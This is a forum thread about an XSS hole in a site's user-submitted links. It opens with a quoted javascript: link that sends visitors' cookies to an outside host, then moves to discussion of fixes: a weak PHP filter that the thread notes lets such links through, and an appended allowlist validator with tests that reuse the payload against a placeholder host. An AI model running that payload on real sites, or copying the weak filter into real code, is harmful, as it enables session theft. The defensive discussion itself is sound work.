Z:
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie

Hmm, does not look good...

Thanks for alerting us.

I deleted the harmful links.

Currently I have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for the links section?

@mals: Thanks for finding a real security problem :)
The geeks shall inherit the properties and methods of object earth.
Links should be validated by admins first.
Kender:
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
The amount of links you can add depends on your totalscore.

How about this snippet to prevent XSS in links?
GeSHi`ed Plaintext code

// Excerpt from a larger function; htmlDisplayError() is the site's own helper.
// Strips one leading "http://" and then refuses anything that still contains
// "://". A value whose scheme is written without slashes, such as the
// "javascript:" link reported above, contains no "://" and passes this check.
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
   return htmlDisplayError("only valid links please.");
}


My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.
stop trying to be funny.
Z:
There are tons of solutions on the net, but this one looks short and good enough:

http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Maybe check out the W3C specification for URLs. I bet you'll find a regex for it.
Z:
I think regex is not a good way, because nothing ensures that a valid URL doesn't contain an evil payload. This statement is only theoretical, but true.

Lessons learned: preventing XSS is a hard nut...
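A scheme-allowlist check for submitted links, added here as an example (not code from this forum or its software). It addresses both the "://" snippet earlier in the thread and the point just made that a syntactically valid URL can still carry a script payload: only http and https are accepted, and the value is HTML-escaped on output. The helper names is_safe_link and render_link are assumptions; parse_url, filter_var and htmlspecialchars are standard PHP.

```php
<?php
// Added example, not the forum's own code. Helper names are hypothetical.
// Instead of searching for "://", accept only URLs whose scheme is on an
// allowlist, then HTML-escape the value when it is written into the page.

function is_safe_link(string $url): bool
{
    // Control characters and whitespace are refused up front: browsers
    // ignore tabs/newlines inside a scheme, so they must not reach parse_url.
    if ($url === '' || strlen($url) > 2048 || preg_match('/[\x00-\x20\x7F]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    // Require an explicit scheme and host; this also rejects
    // scheme-relative values such as "//host/path".
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Allowlist compared case-insensitively: javascript:, data: and any
    // scheme invented later are all refused without listing them.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}

function render_link(string $url, string $label): string
{
    $text = htmlspecialchars($label, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if (!is_safe_link($url)) {
        return $text;                       // drop the href, keep the label
    }
    $href = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $href . '" rel="nofollow">' . $text . '</a>';
}

// Constructed self-check inputs (example.invalid is a reserved name).
$cases = [
    'javascript:document.location="http://example.invalid/?o="+document.cookie' => false,
    'JavaScript:alert(1)'                 => false,
    "java\tscript:alert(1)"               => false,
    '//example.invalid/path'              => false,
    'http://example.invalid/page?q=1#top' => true,
    'https://example.invalid/'            => true,
];
foreach ($cases as $url => $expected) {
    printf("%s %s\n", is_safe_link($url) === $expected ? 'PASS' : 'FAIL', $url);
}
echo render_link('https://example.invalid/?a=1&b=2', 'x<y'), "\n";
```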